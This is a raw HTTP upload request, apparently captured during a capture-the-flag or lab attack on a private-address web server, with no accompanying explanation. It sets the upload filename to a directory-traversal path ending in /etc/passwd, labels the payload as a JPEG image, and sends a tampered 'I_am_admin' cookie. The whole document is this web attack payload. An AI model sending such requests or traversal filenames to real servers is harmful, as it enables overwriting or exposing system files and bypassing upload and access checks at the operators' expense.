POST /?page=upload HTTP/1.1
Host: 10.0.2.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------1855884414425459131026313593
Content-Length: 3150
Origin: http://10.0.2.5
Connection: keep-alive
Referer: http://10.0.2.5/?page=upload
Cookie: I_am_admin=68934a3e9455fa72420237eb05902327
Upgrade-Insecure-Requests: 1
Priority: u=0, i

-----------------------------1855884414425459131026313593
Content-Disposition: form-data; name="MAX_FILE_SIZE"

100000
-----------------------------1855884414425459131026313593
Content-Disposition: form-data; name="uploaded"; filename="../../../../../../../../../../../../etc/passwd"
Content-Type: image/jpeg

د؈




